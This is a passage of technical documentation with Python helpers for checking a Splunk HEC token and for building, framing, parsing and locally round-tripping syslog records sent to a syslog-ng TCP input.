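    """Classify a HEC reply as ('ok'|'auth'|'data'|'server'|'unknown', label)."""
    try:
        code = int(json.loads(body)["code"])
    except (ValueError, KeyError, TypeError):
        return "unknown", f"HTTP {status_code} with a non-HEC body"
    label = HEC_CODES.get(code, f"unrecognised code {code}")
    if code == 0:
        return "ok", label
    if code in AUTH_CODES:
        return "auth", label
    if code in SERVER_CODES:
        return "server", label
    if code in HEC_CODES:
        return "data", label  # token accepted; the request body or channel is the problem
    return "unknown", label


def token_accepted(status_code, body):
    """True when the reply proves the token works, which includes code 5 from an empty POST."""
    return interpret(status_code, body)[0] in ("ok", "data")


def post_check(company, token, ca_bundle=True, event=None):
    """Live check; `requests` is imported here so the rest of the module works offline."""
    import requests
    data = json.dumps(hec_event_dict(event, "hec:check")) if event is not None else None
    r = requests.post(hec_url(company), headers=hec_headers(token), data=data,
                      timeout=10, verify=ca_bundle)
    return interpret(r.status_code, r.text)
```

`post_check("acme", token)` reproduces the empty-POST probe from the repo scripts and should come back as `("data", "No data")`; `post_check("acme", token, event={"check": "ok"})` goes one step further and confirms the token can actually index an event. Pass `ca_bundle="/path/to/ca.pem"` for a private CA rather than turning verification off.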
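test_syslog-ng.py and test_syslog.sh both push a hard-coded `<14>` line at a syslog-ng TCP input. The module below is an added example written for this page, not code from the repository: it shows where `<14>` comes from (facility `user` = 1, severity `info` = 6, PRI = 8 * facility + severity), builds both RFC 3164 and RFC 5424 records with the newline terminator syslog-ng needs on TCP, offers RFC 6587 octet-counting framing for inputs configured that way, parses the PRI back out of a received line, and proves the round trip against a throwaway listener on 127.0.0.1 that stands in for the syslog-ng server. Hostnames, tags and timestamps in the sample records are made up.

```python
# Added example for test_syslog-ng.py and test_syslog.sh; not code from the repository.
import re
import socket
import threading

# RFC 5424 facility and severity numbers (PRI = facility * 8 + severity)
FACILITY = {"kern": 0, "user": 1, "mail": 2, "daemon": 3, "auth": 4, "syslog": 5,
            "authpriv": 10, "local0": 16, "local1": 17, "local2": 18, "local3": 19,
            "local4": 20, "local5": 21, "local6": 22, "local7": 23}
SEVERITY = {"emerg": 0, "alert": 1, "crit": 2, "err": 3, "warning": 4,
            "notice": 5, "info": 6, "debug": 7}
PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)


def pri(facility, severity):
    return FACILITY[facility] * 8 + SEVERITY[severity]


def split_pri(value):
    """Inverse of pri(): <14> is facility 1 (user), severity 6 (info)."""
    return divmod(value, 8)


def build_rfc3164(facility, severity, hostname, tag, msg, timestamp="Jan  1 00:00:00"):
    """BSD-style record; the trailing newline is the delimiter syslog-ng expects on TCP."""
    return f"<{pri(facility, severity)}>{timestamp} {hostname} {tag}: {msg}\n"


def build_rfc5424(facility, severity, hostname, app, msg, timestamp="2024-01-01T00:00:00Z"):
    """RFC 5424 record: VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID STRUCTURED-DATA MSG."""
    return f"<{pri(facility, severity)}>1 {timestamp} {hostname} {app} - - - {msg}\n"


def octet_frame(record):
    """RFC 6587 octet-counting framing, used by TCP inputs that do not rely on newline delimiting."""
    data = record.encode()
    return f"{len(data)} ".encode() + data


def parse_record(line):
    """Pull facility/severity out of a received line; None when the PRI is missing or out of range."""
    m = PRI_RE.match(line)
    if not m or int(m.group(1)) > 191:
        return None
    facility, severity = split_pri(int(m.group(1)))
    return {"facility": facility, "severity": severity, "body": m.group(2)}


def send_tcp(host, port, records, timeout=5):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall("".join(records).encode())


def local_roundtrip(records):
    """Stand-in for a syslog-ng server: listen on 127.0.0.1, send the records, return the lines received."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    received = []

    def serve():
        conn, _ = srv.accept()
        with conn:
            buf = b""
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
        received.extend(buf.decode().split("\n"))

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    send_tcp("127.0.0.1", port, records)
    t.join(5)
    srv.close()
    return [line for line in received if line]
```

Against a real server, replace `local_roundtrip` with `send_tcp(dest_ip, dest_port, [build_rfc3164("user", "info", hostname, "test", message)])` and look for the line in syslog-ng's destination; if nothing arrives, the first things to check are the missing newline terminator and whether the input is configured for octet-counting framing.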